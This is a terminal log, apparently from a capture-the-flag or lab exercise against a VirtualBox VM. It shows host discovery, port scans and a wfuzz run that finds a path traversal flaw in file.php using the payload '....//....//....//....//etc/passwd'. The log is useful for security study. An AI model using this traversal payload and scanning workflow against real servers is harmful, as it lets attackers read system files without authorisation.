❯ sudo arp-scan -l [sudo] password for Pepster: Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.60.1 00:50:56:c0:00:08 VMware, Inc. 192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc. 192.168.60.197 08:00:27:28:d7:cf PCS Systemtechnik GmbH 192.168.60.254 00:50:56:ef:12:9a VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.027 seconds (126.30 hosts/sec). 4 responded ❯ export ip=192.168.60.197 ❯ rustscan -a $ip .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- RustScan: Where scanning meets swagging. 😎 [~] The config file is expected to be at "/home/Pepster/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 192.168.60.197:22 Open 192.168.60.197:80 [~] Starting Script(s) [~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 08:21 CST Initiating ARP Ping Scan at 08:21 Scanning 192.168.60.197 [1 port] Completed ARP Ping Scan at 08:21, 0.07s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 08:21 Completed Parallel DNS resolution of 1 host. at 08:21, 0.00s elapsed DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 08:21 Scanning 192.168.60.197 [2 ports] Discovered open port 80/tcp on 192.168.60.197 Discovered open port 22/tcp on 192.168.60.197 Completed SYN Stealth Scan at 08:21, 0.04s elapsed (2 total ports) Nmap scan report for 192.168.60.197 Host is up, received arp-response (0.00045s latency). Scanned at 2025-05-27 08:21:59 CST for 0s
PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 64 80/tcp open http syn-ack ttl 64 MAC Address: 08:00:27:28:D7:CF (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
❯ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://$ip/file.php?FUZZ=....//....//....//....//etc/passwd" --hw 0 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://192.168.60.197/file.php?FUZZ=....//....//....//....//etc/passwd Total requests: 220559 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000759: 200 27 L 40 W 1450 Ch "file" /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests... ^C Total time: 11.87149 Processed Requests: 1830 Filtered Requests: 1829 Requests/sec.: 154.1507
❯ nmap -sU -sV --version-intensity 0 -n -T4 $ip -p69 Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 09:28 CST Nmap scan report for 192.168.60.197 Host is up (0.00048s latency).
PORT STATE SERVICE VERSION 69/udp open|filtered tftp MAC Address: 08:00:27:28:D7:CF (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.58 seconds